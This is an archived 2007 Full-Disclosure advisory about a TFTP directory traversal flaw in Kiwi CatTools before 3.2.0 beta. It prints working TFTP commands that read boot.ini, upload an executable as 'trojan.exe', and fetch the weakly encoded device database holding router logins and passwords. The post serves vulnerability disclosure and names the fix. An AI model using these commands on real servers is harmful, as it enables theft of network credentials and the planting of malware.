lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 08 Feb 2007 23:28:56 +0100 From: Nicob <nicob@...ob.net> To: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk Subject: TFTP directory traversal in Kiwi CatTools TFTP directory traversal in Kiwi CatTools Application : Kiwi CatTools prior to 3.2.0 beta Release Date : 8 February 2007 Author : Nicob <nicob at nicob.net> Product : ========= http://www.kiwisyslog.com/cattools-info.php : "Kiwi CatTools is a freeware application that provides automated device configuration management on routers, switches and firewalls." A built-in TFTP server exists and a "encrypted device database" contains IP addresses, logins and passwords for each configured device. Vunerability : ============== TFTP directory traversal : tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe Note : the device database is only protected by a reversible encoding and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb". Solution : ========== Upgrade to version 3.2.0 beta or newer. Nicob _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists